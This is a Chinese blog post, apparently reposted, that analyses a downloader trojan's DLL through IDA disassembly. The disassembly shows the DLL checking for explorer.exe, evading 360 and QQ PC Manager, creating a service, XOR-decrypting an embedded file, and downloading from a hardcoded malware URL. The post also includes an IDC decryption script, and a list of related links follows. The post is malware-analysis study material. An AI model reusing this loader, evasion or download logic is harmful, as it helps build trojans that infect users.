简单的下载者木马分析(2)dll部分
附件:http://bbs.pediy.com/showthread.php?p=1097416#post1097416
dll部分
这里面的建立service部分没搞明白,以前没有接触过不知道起到什么作用的求教啊。。。
功能分析:
1.提升进程权限
2.判断dll运行环境
3.释放文件,创建服务(这几个api以前没见过还没搞懂)
4.创建线程,下载文件(url: http://c.shidaihuabian.com/s.gif)
部分反汇编代码:
Dll入口
DllEntryPoint proc near
.text:10001510
.text:10001510 dllpath = byte ptr -140h
.text:10001510 var_3C = byte ptr -3Ch
.text:10001510 var_3B = byte ptr -3Bh
.text:10001510 var_3A = byte ptr -3Ah
.text:10001510 var_39 = byte ptr -39h
.text:10001510 var_38 = byte ptr -38h
.text:10001510 var_37 = byte ptr -37h
.text:10001510 var_36 = byte ptr -36h
.text:10001510 var_35 = byte ptr -35h
.text:10001510 var_34 = byte ptr -34h
.text:10001510 var_33 = byte ptr -33h
.text:10001510 var_32 = byte ptr -32h
.text:10001510 var_31 = byte ptr -31h
.text:10001510 var_30 = byte ptr -30h
.text:10001510 var_2F = byte ptr -2Fh
.text:10001510 var_2E = byte ptr -2Eh
.text:10001510 SubStr = byte ptr -2Ch
.text:10001510 var_2B = byte ptr -2Bh
.text:10001510 var_2A = byte ptr -2Ah
.text:10001510 var_29 = byte ptr -29h
.text:10001510 var_28 = byte ptr -28h
.text:10001510 var_27 = byte ptr -27h
.text:10001510 var_26 = byte ptr -26h
.text:10001510 var_25 = byte ptr -25h
.text:10001510 var_24 = byte ptr -24h
.text:10001510 var_23 = byte ptr -23h
.text:10001510 var_22 = byte ptr -22h
.text:10001510 var_21 = byte ptr -21h
.text:10001510 var_20 = byte ptr -20h
.text:10001510 var_1C = byte ptr -1Ch
.text:10001510 var_1B = byte ptr -1Bh
.text:10001510 var_1A = byte ptr -1Ah
.text:10001510 var_19 = byte ptr -19h
.text:10001510 var_18 = byte ptr -18h
.text:10001510 var_17 = byte ptr -17h
.text:10001510 var_16 = byte ptr -16h
.text:10001510 var_15 = byte ptr -15h
.text:10001510 var_14 = byte ptr -14h
.text:10001510 var_13 = byte ptr -13h
.text:10001510 var_12 = byte ptr -12h
.text:10001510 var_11 = byte ptr -11h
.text:10001510 var_10 = byte ptr -10h
.text:10001510 var_C = byte ptr -0Ch
.text:10001510 var_B = byte ptr -0Bh
.text:10001510 var_A = byte ptr -0Ah
.text:10001510 var_9 = byte ptr -9
.text:10001510 var_8 = byte ptr -8
.text:10001510 var_7 = byte ptr -7
.text:10001510 var_6 = byte ptr -6
.text:10001510 var_5 = byte ptr -5
.text:10001510 var_4 = byte ptr -4
.text:10001510 var_3 = byte ptr -3
.text:10001510 var_2 = byte ptr -2
.text:10001510 var_1 = byte ptr -1
.text:10001510 hinstDLL = dword ptr 8
.text:10001510 fdwReason = dword ptr 0Ch
.text:10001510 lpReserved = dword ptr 10h
.text:10001510
.text:10001510 push ebp
.text:10001511 mov ebp, esp
.text:10001513 sub esp, 140h
.text:10001519 mov eax, [ebp+fdwReason]
.text:1000151C dec eax
.text:1000151D jnz loc_100016E9
.text:10001523 push ebx
.text:10001524 push 1
提升进程权限
.text:10001526 call _rtladjustprivilege ;
判断dll运行环境
.text:1000152B mov bl, 'e'
.text:1000152D mov [ebp+var_2B], 'x'
.text:10001531 mov [ebp+SubStr], bl
.text:10001534 mov [ebp+var_2A], 'p'
.text:10001538 mov [ebp+var_29], 'l'
.text:1000153C mov [ebp+var_28], 'o'
.text:10001540 mov [ebp+var_27], 'r'
.text:10001544 mov [ebp+var_26], bl
.text:10001547 mov [ebp+var_25], 'r'
.text:1000154B mov [ebp+var_24], '.'
.text:1000154F mov [ebp+var_23], bl
.text:10001552 mov [ebp+var_22], 78h
.text:10001556 mov [ebp+var_21], bl
.text:10001559 mov [ebp+var_20], 0 ; explorer.exe
.text:1000155D nop
.text:1000155E nop
.text:1000155F nop
.text:10001560 nop
.text:10001561 mov eax, [ebp+hinstDLL]
.text:10001564 push 104h
.text:10001569 push offset _modulepath
.text:1000156E push eax
.text:1000156F call _getmodulefilename ; dll的路径
.text:10001574 add esp, 10h
.text:10001577 push offset _modulepath ; lpString2
.text:1000157C push offset _modulepathcopy ; lpString1
.text:10001581 call ds:lstrcpyA
.text:10001587 lea ecx, [ebp+dllpath]
.text:1000158D push 104h ; nSize
.text:10001592 push ecx ; lpFilename
.text:10001593 push 0 ; hModule
.text:10001595 call ds:GetModuleFileNameA ; 调用dll的路径
.text:1000159B lea edx, [ebp+SubStr]
.text:1000159E lea eax, [ebp+dllpath]
.text:100015A4 push edx ; SubStr
.text:100015A5 push eax ; Str
.text:100015A6 call _strlwr
.text:100015AB add esp, 4
.text:100015AE push eax ; Str
.text:100015AF call strstr
.text:100015B4 add esp, 8
.text:100015B7 test eax, eax
.text:100015B9 jz short loc_100015F0 ; 如果调用dll的不是explorer.exe跳转
.text:100015BB push esi
.text:100015BC nop
.text:100015BD push 0
释放文件 创建服务
.text:100015BF call sub_10008B60 ;
.text:100015C4 add esp, 4
创建线程 下载url文件
.text:100015C7 mov esi, ds:CreateThread ;
.text:100015CD push 0 ; lpThreadId
.text:100015CF push 0 ; dwCreationFlags
.text:100015D1 push 0 ; lpParameter
.text:100015D3 push offset loc_100011D0 ; lpStartAddress
.text:100015D8 push 0 ; dwStackSize
.text:100015DA push 0 ; lpThreadAttributes
.text:100015DC call esi ; CreateThread
.text:100015DE push 0 ; lpThreadId
.text:100015E0 push 0 ; dwCreationFlags
.text:100015E2 push 0 ; lpParameter
.text:100015E4 push offset StartAddress ; lpStartAddress
.text:100015E9 push 0 ; dwStackSize
.text:100015EB push 0 ; lpThreadAttributes
.text:100015ED call esi ; CreateThread
.text:100015EF pop esi
.text:100015F0
.text:100015F0 loc_100015F0: ; CODE XREF: DllEntryPoint+A9j
.text:100015F0 mov cl, 'a' ; 判断是否在安全软件中运行
.text:100015F2 mov dl, '0'
.text:100015F4 mov [ebp+var_37], cl
.text:100015F7 mov [ebp+var_17], cl
.text:100015FA mov [ebp+var_3A], dl
.text:100015FD mov [ebp+var_1A], dl
.text:10001600 lea ecx, [ebp+var_3C]
.text:10001603 lea edx, [ebp+dllpath]
.text:10001609 mov al, 'q'
.text:1000160B push ecx ; SubStr
.text:1000160C push edx ; Str
.text:1000160D mov [ebp+var_3C], '3'
.text:10001611 mov [ebp+var_3B], '6'
.text:10001615 mov [ebp+var_39], 'r'
.text:10001619 mov [ebp+var_38], bl
.text:1000161C mov [ebp+var_36], 'l'
.text:10001620 mov [ebp+var_35], 'p'
.text:10001624 mov [ebp+var_34], 'r'
.text:10001628 mov [ebp+var_33], 'o'
.text:1000162C mov [ebp+var_32], '.'
.text:10001630 mov [ebp+var_31], bl
.text:10001633 mov [ebp+var_30], 78h
.text:10001637 mov [ebp+var_2F], bl
.text:1000163A mov [ebp+var_2E], 0 ; 360realpro.exe
.text:1000163E mov [ebp+var_C], al
.text:10001641 mov [ebp+var_B], al
.text:10001644 mov [ebp+var_A], 'p'
.text:10001648 mov [ebp+var_9], 'c'
.text:1000164C mov [ebp+var_8], 'm'
.text:10001650 mov [ebp+var_7], 'g'
.text:10001654 mov [ebp+var_6], 'r'
.text:10001658 mov [ebp+var_5], '.'
.text:1000165C mov [ebp+var_4], bl
.text:1000165F mov [ebp+var_3], 78h
.text:10001663 mov [ebp+var_2], bl
.text:10001666 mov [ebp+var_1], 0 ; qqpcmgr.exe qq电脑管家进程
.text:1000166A mov [ebp+var_1C], '3'
.text:1000166E mov [ebp+var_1B], '6'
.text:10001672 mov [ebp+var_19], al
.text:10001675 mov [ebp+var_18], 'u'
.text:10001679 mov [ebp+var_16], 'r'
.text:1000167D mov [ebp+var_15], 't'
.text:10001681 mov [ebp+var_14], '.'
.text:10001685 mov [ebp+var_13], bl
.text:10001688 mov [ebp+var_12], 'x'
.text:1000168C mov [ebp+var_11], bl
.text:1000168F mov [ebp+var_10], 0 ; 360urt.exe
.text:10001693 call _strlwr
.text:10001698 add esp, 4
.text:1000169B push eax ; Str
.text:1000169C call strstr
.text:100016A1 add esp, 8
.text:100016A4 test eax, eax
.text:100016A6 pop ebx
.text:100016A7 jnz short loc_100016F4 ; 在安全软件中运行
.text:100016A9 lea eax, [ebp+var_1C]
.text:100016AC lea ecx, [ebp+dllpath]
.text:100016B2 push eax ; SubStr
.text:100016B3 push ecx ; Str
.text:100016B4 call _strlwr
.text:100016B9 add esp, 4
.text:100016BC push eax ; Str
.text:100016BD call strstr
.text:100016C2 add esp, 8
.text:100016C5 test eax, eax
.text:100016C7 jnz short loc_100016F4 ; 在安全软件中运行
.text:100016C9 lea edx, [ebp+var_C]
.text:100016CC lea eax, [ebp+dllpath]
.text:100016D2 push edx ; SubStr
.text:100016D3 push eax ; Str
.text:100016D4 call _strlwr
.text:100016D9 add esp, 4
.text:100016DC push eax ; Str
.text:100016DD call strstr
.text:100016E2 add esp, 8
.text:100016E5 test eax, eax
.text:100016E7 jnz short loc_100016F4 ; 在安全软件中运行
.text:100016E9
.text:100016E9 loc_100016E9: ; CODE XREF: DllEntryPoint+Dj
.text:100016E9 mov eax, 1
.text:100016EE mov esp, ebp
.text:100016F0 pop ebp
.text:100016F1 retn 0Ch
.text:100016F4 ; ---------------------------------------------------------------------------
.text:100016F4
.text:100016F4 loc_100016F4: ; CODE XREF: DllEntryPoint+197j
.text:100016F4 ; DllEntryPoint+1B7j ...
.text:100016F4 push 0 ; 在安全软件中运行
.text:100016F6 call sub_10008B60
.text:100016FB add esp, 4
.text:100016FE push 1388h ; dwMilliseconds
.text:10001703 call ds:Sleep
.text:10001709 push 0 ; uExitCode
.text:1000170B call ds:ExitProcess
.text:1000170B DllEntryPoint endp
.text:1000170B
//
创建文件 建立service
建立service的这一部分不是很懂,建立service的作用是什么的?
sub_10008B60 proc near ; CODE XREF: DllEntryPoint+AFp
.text:10008B60 ; DllEntryPoint+1E6p
.text:10008B60
.text:10008B60 arg_0 = dword ptr 8
.text:10008B60
.text:10008B60 push ebp
.text:10008B61 mov ebp, esp
.text:10008B63 mov eax, [ebp+arg_0] ; eax=0
.text:10008B66 push esi
.text:10008B67 push eax
.text:10008B68 call loc_100067F0 ; 释放文件
.text:10008B6D mov esi, eax
.text:10008B6F add esp, 4
.text:10008B72 cmp esi, 0FFFFFFFFh
.text:10008B75 jnz short loc_10008B87
.text:10008B77 push eax
.text:10008B78 call loc_10006250 ; 建立service
.text:10008B7D add esp, 4
.text:10008B80 nop
.text:10008B81 nop
.text:10008B82 xor al, al
.text:10008B84 pop esi
.text:10008B85 pop ebp
.text:10008B86 retn
.text:10008B87 ; ---------------------------------------------------------------------------
.text:10008B87
.text:10008B87 loc_10008B87: ; CODE XREF: sub_10008B60+15j
.text:10008B87 push esi
.text:10008B88 call sub_10008900
.text:10008B8D push 0Ah
.text:10008B8F call _Sleep
.text:10008B94 push esi ; BytesReturned
.text:10008B95 call sub_10006AE0
.text:10008B9A push esi
.text:10008B9B call loc_100027A0
.text:10008BA0 push esi
.text:10008BA1 call loc_10006250
.text:10008BA6 add esp, 14h
.text:10008BA9 mov al, 1
.text:10008BAB pop esi
.text:10008BAC pop ebp
.text:10008BAD retn
.text:10008BAD sub_10008B60 endp
.text:10008BAD
/
文件解密
sub_10006110 proc near ; CODE XREF: sub_100065A0+17p
.text:10006110 xor eax, eax
.text:10006112
.text:10006112 loc_10006112: ; CODE XREF: sub_10006110+2Bj
.text:10006112 mov ecx, eax
.text:10006114 and ecx, 80000001h
.text:1000611A jns short loc_10006121 ; 符号为正
.text:1000611C dec ecx
.text:1000611D or ecx, 0FFFFFFFEh
.text:10006120 inc ecx
.text:10006121
.text:10006121 loc_10006121: ; CODE XREF: sub_10006110+Aj
.text:10006121 mov dl, byte_1000D094[ecx]
.text:10006127 mov cl, byte_10019EA4[eax]
.text:1000612D xor cl, dl
.text:1000612F mov byte_10019EA4[eax], cl
.text:10006135 inc eax
.text:10006136 cmp eax, 3040h
.text:1000613B jl short loc_10006112
.text:1000613D xor eax, eax
.text:1000613F retn
.text:1000613F sub_10006110 endp
解密idc
#include <idc.idc>
static encrpty(mes,key,size)
{
auto i,x,y,eax,ecx;
eax=0;
for(i=0;i<size;i=i+1)
{
ecx=eax;
ecx=ecx&0x80000001;
if(ecx<=0)//不是jns符号为正
{
ecx=ecx-1;
ecx=ecx|0x0FFFFFFFE;
ecx=ecx+1;
}
x=Byte(mes+eax);
y=Byte(key+ecx);
x=x^y;
PatchByte(mes+eax,x);
eax=eax+1;
Message("%d\n",eax);
}
}
///
建立服务???求教
loc_10006140: ; CODE XREF: .text:100068B0p
.text:10006140 push ebp
.text:10006141 mov ebp, esp
.text:10006143 sub esp, 104h
.text:10006149 mov eax, dword_10019CE0
.text:1000614E mov ecx, dword_10019CE4
.text:10006154 mov edx, dword_10019CE8
.text:1000615A mov [ebp-104h], eax
.text:10006160 mov al, byte_10019CEC
.text:10006165 push ebx
.text:10006166 push esi
.text:10006167 push edi
.text:10006168 mov [ebp-100h], ecx
.text:1000616E mov [ebp-0F8h], al
.text:10006174 mov ecx, 3Dh
.text:10006179 xor eax, eax
.text:1000617B lea edi, [ebp-0F7h]
.text:10006181 mov [ebp-0FCh], edx
.text:10006187 rep stosd
.text:10006189 stosw
.text:1000618B or ebx, 0FFFFFFFFh
.text:1000618E stosb
.text:1000618F jb short near ptr loc_10006193+1
.text:10006191 jnb short near ptr loc_10006193+1
.text:10006193
.text:10006193 loc_10006193: ; CODE XREF: .text:1000618Fj
.text:10006193 ; .text:10006191j
.text:10006193 call near ptr 106A6402h
.text:10006198 push 0
.text:1000619A call _openSCManager
.text:1000619F mov esi, eax
.text:100061A1 add esp, 0Ch
.text:100061A4 test esi, esi
.text:100061A6 jz loc_1000623C
.text:100061AC mov ecx, [ebp+8]
.text:100061AF push 0
.text:100061B1 push 0
.text:100061B3 push 0
.text:100061B5 push 0
.text:100061B7 push 0
.text:100061B9 push ecx
.text:100061BA push 0
.text:100061BC push 3
.text:100061BE push 1
.text:100061C0 push 10h
.text:100061C2 push offset aAuth ; "auth"
.text:100061C7 push offset aAuth ; "auth"
.text:100061CC push esi
.text:100061CD call sub_10002080
.text:100061D2 mov ebx, ds:GetLastError
.text:100061D8 add esp, 34h
.text:100061DB mov edi, eax
.text:100061DD call ebx ; GetLastError
.text:100061DF cmp eax, 431h
.text:100061E4 jnz short loc_100061F8
.text:100061E6 push 10h
.text:100061E8 push offset aAuth ; "auth"
.text:100061ED push esi
.text:100061EE call _openservice
.text:100061F3 add esp, 0Ch
.text:100061F6 mov edi, eax
.text:100061F8
.text:100061F8 loc_100061F8: ; CODE XREF: .text:100061E4j
.text:100061F8 push 0
.text:100061FA push 0
.text:100061FC push edi
.text:100061FD call sub_10002250
.text:10006202 add esp, 0Ch
.text:10006205 test eax, eax
.text:10006207 jnz short loc_1000620B
.text:10006209 call ebx ; GetLastError
.text:1000620B
.text:1000620B loc_1000620B: ; CODE XREF: .text:10006207j
.text:1000620B push edi
.text:1000620C call _closeservicehandle
.text:10006211 push esi
.text:10006212 call _closeservicehandle
.text:10006217 push 0
.text:10006219 push 0
.text:1000621B push 3
.text:1000621D push 0
.text:1000621F push 0
.text:10006221 lea edx, [ebp-104h]
.text:10006227 push 0C0000000h
.text:1000622C push edx
.text:1000622D call _createfile
.text:10006232 add esp, 24h
.text:10006235 pop edi
.text:10006236 pop esi
.text:10006237 pop ebx
.text:10006238 mov esp, ebp
.text:1000623A pop ebp
.text:1000623B retn
.text:1000623C ; ---------------------------------------------------------------------------
.text:1000623C
.text:1000623C loc_1000623C: ; CODE XREF: .text:100061A6j
.text:1000623C pop edi
.text:1000623D mov eax, ebx
.text:1000623F pop esi
.text:10006240 pop ebx
.text:10006241 mov esp, ebp
.text:10006243 pop ebp
.text:10006244 retn
.text:10006244 ; ---------------------------------------------------------------------------
.text:10006245 align 10h
/
urldownload部分
DWORD __stdcall loc_100011D0(LPVOID)
.text:100011D0 loc_100011D0: ; DATA XREF: DllEntryPoint+C3o
.text:100011D0 ; Simenze+12o
.text:100011D0 push ebp
.text:100011D1 mov ebp, esp
.text:100011D3 sub esp, 32Ch
.text:100011D9 push ebx
.text:100011DA push esi
.text:100011DB push edi
.text:100011DC nop
.text:100011DD nop
.text:100011DE nop
.text:100011DF nop
.text:100011E0 nop
.text:100011E1 nop
.text:100011E2 jb short loc_100011E7
.text:100011E4 jnb short loc_100011E7
.text:100011E4 ; ---------------------------------------------------------------------------
.text:100011E6 db 0E8h
.text:100011E7 ; ---------------------------------------------------------------------------
.text:100011E7
.text:100011E7 loc_100011E7: ; CODE XREF: .text:100011E2j
.text:100011E7 ; .text:100011E4j
.text:100011E7 mov esi, ds:LoadLibraryA
.text:100011ED mov dword ptr [ebp-34h], 1
.text:100011F4 mov bl, 'i'
.text:100011F6
.text:100011F6 loc_100011F6: ; CODE XREF: .text:10001427j
.text:100011F6 push 9C40h
.text:100011FB call _Sleep
.text:10001200 mov ecx, 10h
.text:10001205 xor eax, eax
.text:10001207 lea edi, [ebp-77h]
.text:1000120A mov byte ptr [ebp-98h], 'h'
.text:10001211 mov byte ptr [ebp-97h], 't'
.text:10001218 mov byte ptr [ebp-96h], 't'
.text:1000121F mov byte ptr [ebp-95h], 'p'
.text:10001226 mov byte ptr [ebp-94h], ':'
.text:1000122D mov byte ptr [ebp-93h], '/'
.text:10001234 mov byte ptr [ebp-92h], '/'
.text:1000123B mov byte ptr [ebp-91h], 'c'
.text:10001242 mov byte ptr [ebp-90h], '.'
.text:10001249 mov byte ptr [ebp-8Fh], 's'
.text:10001250 mov byte ptr [ebp-8Eh], 'h'
.text:10001257 mov [ebp-8Dh], bl ; i
.text:1000125D mov byte ptr [ebp-8Ch], 'd'
.text:10001264 mov byte ptr [ebp-8Bh], 'a'
.text:1000126B mov [ebp-8Ah], bl
.text:10001271 mov byte ptr [ebp-89h], 'h'
.text:10001278 mov byte ptr [ebp-88h], 'u'
.text:1000127F mov byte ptr [ebp-87h], 'a'
.text:10001286 mov byte ptr [ebp-86h], 'b'
.text:1000128D mov [ebp-85h], bl
.text:10001293 mov byte ptr [ebp-84h], 'a'
.text:1000129A mov byte ptr [ebp-83h], 'n'
.text:100012A1 mov byte ptr [ebp-82h], '.'
.text:100012A8 mov byte ptr [ebp-81h], 'c'
.text:100012AF mov byte ptr [ebp-80h], 'o'
.text:100012B3 mov byte ptr [ebp-7Fh], 'm'
.text:100012B7 mov byte ptr [ebp-7Eh], '/'
.text:100012BB mov byte ptr [ebp-7Dh], 's'
.text:100012BF mov byte ptr [ebp-7Ch], '.'
.text:100012C3 mov byte ptr [ebp-7Bh], 'g'
.text:100012C7 mov [ebp-7Ah], bl
.text:100012CA mov byte ptr [ebp-79h], 'f'
.text:100012CE mov byte ptr [ebp-78h], 0 ; http://c.shidaihuabian.com/s.gif
.text:100012D2 rep stosd
.text:100012D4 stosw
.text:100012D6 stosb
.text:100012D7 mov ecx, 40h
.text:100012DC xor eax, eax
.text:100012DE lea edi, [ebp-19Bh]
.text:100012E4 mov byte ptr [ebp-19Ch], 0
.text:100012EB rep stosd
.text:100012ED stosw
.text:100012EF add esp, 4
.text:100012F2 mov byte ptr [ebp-1Ch], '\'
.text:100012F6 stosb
.text:100012F7 mov byte ptr [ebp-1Bh], 't'
.text:100012FB mov byte ptr [ebp-1Ah], 'e'
.text:100012FF mov byte ptr [ebp-19h], 'm'
.text:10001303 mov byte ptr [ebp-18h], 'p'
.text:10001307 mov byte ptr [ebp-17h], '\'
.text:1000130B mov byte ptr [ebp-16h], 'o'
.text:1000130F mov byte ptr [ebp-15h], 'l'
.text:10001313 mov byte ptr [ebp-14h], 'm'
.text:10001317 mov byte ptr [ebp-13h], '.'
.text:1000131B mov [ebp-12h], bl ; i
.text:1000131E mov byte ptr [ebp-11h], 'n'
.text:10001322 mov [ebp-10h], bl
.text:10001325 mov byte ptr [ebp-0Fh], 0
.text:10001329 nop
.text:1000132A nop
.text:1000132B nop
.text:1000132C lea eax, [ebp-0Ch]
.text:1000132F mov byte ptr [ebp-0Ch], 'u'
.text:10001333 push eax
.text:10001334 mov byte ptr [ebp-0Bh], 'r'
.text:10001338 mov byte ptr [ebp-0Ah], 'l'
.text:1000133C mov byte ptr [ebp-9], 'm'
.text:10001340 mov byte ptr [ebp-8], 'o'
.text:10001344 mov byte ptr [ebp-7], 'n'
.text:10001348 mov byte ptr [ebp-6], '.'
.text:1000134C mov byte ptr [ebp-5], 'd'
.text:10001350 mov byte ptr [ebp-4], 'l'
.text:10001354 mov byte ptr [ebp-3], 'l'
.text:10001358 mov byte ptr [ebp-2], 0
.text:1000135C call esi ; loadlibrary 加载urlmon.dll
.text:1000135E test eax, eax
.text:10001360 jz loc_10001400
.text:10001366 lea ecx, [ebp-30h]
.text:10001369 mov byte ptr [ebp-30h], 'U'
.text:1000136D push ecx ; urlloadtofile
.text:1000136E push eax ; urlmon.dll
.text:1000136F mov byte ptr [ebp-2Fh], 'R'
.text:10001373 mov byte ptr [ebp-2Eh], 'L'
.text:10001377 mov byte ptr [ebp-2Dh], 'D'
.text:1000137B mov byte ptr [ebp-2Ch], 'o'
.text:1000137F mov byte ptr [ebp-2Bh], 'w'
.text:10001383 mov byte ptr [ebp-2Ah], 'n'
.text:10001387 mov byte ptr [ebp-29h], 'l'
.text:1000138B mov byte ptr [ebp-28h], 'o'
.text:1000138F mov byte ptr [ebp-27h], 'a'
.text:10001393 mov byte ptr [ebp-26h], 'd'
.text:10001397 mov byte ptr [ebp-25h], 'T'
.text:1000139B mov byte ptr [ebp-24h], 'o'
.text:1000139F mov byte ptr [ebp-23h], 'F'
.text:100013A3 mov [ebp-22h], bl ; i
.text:100013A6 mov byte ptr [ebp-21h], 'l'
.text:100013AA mov byte ptr [ebp-20h], 'e'
.text:100013AE mov byte ptr [ebp-1Fh], 'A'
.text:100013B2 mov byte ptr [ebp-1Eh], 0 ; urlloadtofile
.text:100013B6 call ds:GetProcAddress
.text:100013BC lea edx, [ebp-19Ch]
.text:100013C2 push 104h
.text:100013C7 push edx
.text:100013C8 mov _urlloadtofile, eax
.text:100013CD call _getwindowsdirectory
.text:100013D2 add esp, 8
.text:100013D5 lea eax, [ebp-1Ch]
.text:100013D8 lea ecx, [ebp-19Ch]
.text:100013DE push eax
.text:100013DF push ecx
.text:100013E0 call ds:lstrcatA
.text:100013E6 push 0
.text:100013E8 lea edx, [ebp-19Ch] ; %system%+filename 储存为本地的文件名称
.text:100013EE push 0
.text:100013F0 lea eax, [ebp-98h] ; http:...url地址
.text:100013F6 push edx
.text:100013F7 push eax
.text:100013F8 push 0
.text:100013FA call _urlloadtofile
.text:10001400
.text:10001400 loc_10001400: ; CODE XREF: .text:10001360j
.text:10001400 lea ecx, [ebp-19Ch]
.text:10001406 push ecx
.text:10001407 call _getfileattributes
.text:1000140C add esp, 4
.text:1000140F cmp eax, 0FFFFFFFFh
.text:10001412 jnz short loc_1000143B
.text:10001414 mov eax, [ebp-34h]
.text:10001417 cmp eax, 0Ah
.text:1000141A jz loc_100014F6
.text:10001420 inc eax
.text:10001421 cmp eax, 1Eh
.text:10001424 mov [ebp-34h], eax
.text:10001427 jl loc_100011F6
.text:1000142D pop edi
.text:1000142E pop esi
.text:1000142F mov eax, 1
.text:10001434 pop ebx
.text:10001435 mov esp, ebp
.text:10001437 pop ebp
.text:10001438 retn 4
.text:1000143B ; ---------------------------------------------------------------------------
.text:1000143B
转载于:https://www.cnblogs.com/maixiaokou/archive/2012/08/26/2657359.html
简单的下载者木马分析(2)dll部分相关推荐
- 一个简单木马分析及接管利用
最近一段时间,感觉工作很是杂乱无章,博客也基本没时间来写,基本每月一篇,其实每写一篇也代表目前我自己的工作状态及内容.最近搞逆向这一块,找了些样本分析例子,自己也研究了一下,感觉有不少好东西,当然这些 ...
- 【木马分析】远控盗号木马伪装成850Game作恶
很喜欢配图 前言 近期,360QVM团队捕获到一类在网上广泛传播的远控盗号木马,该木马伪装为正规棋牌游戏850Game的安装程序,在伪造的钓鱼网站(如:www.gam850.com)上挂马并诱骗用户下 ...
- CS -exe木马分析
CS -exe木马分析 Cobalt Strike是渗透测试工具,可以通过exe木马实现远程控制. 一:生成exe Windows Executable 生成可执行exe木马:payload分段 Wi ...
- 来自播放器的你——“中国插件联盟”木马分析
360安全卫士 · 2015/06/26 16:05 0x00 前言 图:播放器挂马行为链 在国内流行的影音播放器客户端内嵌广告中,有一部分来自广告联盟和各种营销平台.在搜狐影音展示的一个私服广告页面 ...
- 移花接木大法:新型“白利用”华晨远控木马分析
360安全卫士 · 2015/05/28 5:11 0x00 前言 "白利用"是木马对抗主动防御类软件的一种常用手法.国内较早一批"白利用"木马是通过系统文件r ...
- 病毒分析之“驱动人生”挖矿木马分析及其清除方案
"驱动人生"挖矿木马分析及其清除方案 0x00 概述 自2018年12月份"驱动人生"挖矿木马爆发以来,此木马一直处于活跃状态,更新版本更是达到了20+次.此木 ...
- 最简单直接粗暴的Mothur分析OTU教程
最简单直接粗暴的Mothur分析OTU教程 废话不多说,首先你需要下载Mothur,直接百度去官网下载 第一步:准备需要分析OTU的序列文件(fasta格式) 一般通过载体连接.大肠杆菌克隆.测序得到 ...
- 实验一木马分析(隐藏分析)实验
实验一木马分析(隐藏分析)实验 1.木马隐藏技术 1)程序隐藏 木马程序可以利用程序捆绑的方式,将自己和正常的exe 文件进行捆绑.当双击运行捆绑后的程序时,正常的exe 文件运行了.程序隐藏只能达到 ...
- 如何对页面进行简单的性能检测与分析
本文首发于:https://github.com/bigo-frontend/blog/ 欢迎关注.转载. 前言 页面性能的好与坏,直接影响到用户的留存.对于前端开发者来说,不能以感官的体验进行判断, ...
- 叶绿体基因组简单重复序列(SSRs)分析
叶绿体基因组简单重复序列(SSRs)分析 简单重复序列: single sequence repeats (SSRs) 简单重复序列又被称为微卫星序列 是指基因组中的一段串联重复序列,如:AAAAAA ...
最新文章
- linux系统proc目录进程信息详解
- 如何使用Autopano Video Pro进行全景视频拼接?
- WRF,WPS,WRF-Chem安装及编译步骤及bug总结(2)
- PHP中MySQL操作相关方法
- 工作流引擎的五大接口
- 放学默示录Ⅰ:来!抠奖 移动游戏策划案
- 修改fragment的进入动画_3DsMax—牛顿摆球(动量守恒摆球)动画
- quartz各版本MySQL数据库存储建表SQL语句
- 写一个公用的gpio口驱动
- win10 安装visual studio 2015遇到的坑
- vue-webpack3x -- webpack4x
- git 本地代码到远程库
- 编译华硕路由器ACRH17源代码小记
- linux配置maven环境变量
- 99%的人都能看懂的MQ补偿机制
- Vue实战项目开发--首页开发
- wamp php 如何安装,WAMP的详细安装过程分享
- 概念性知识与程序性知识的关系
- 纪念一下学写pipeline时脑子里的坑
- 武汉第一职业教育中心计算机技能高考,武汉市第一职业教育中心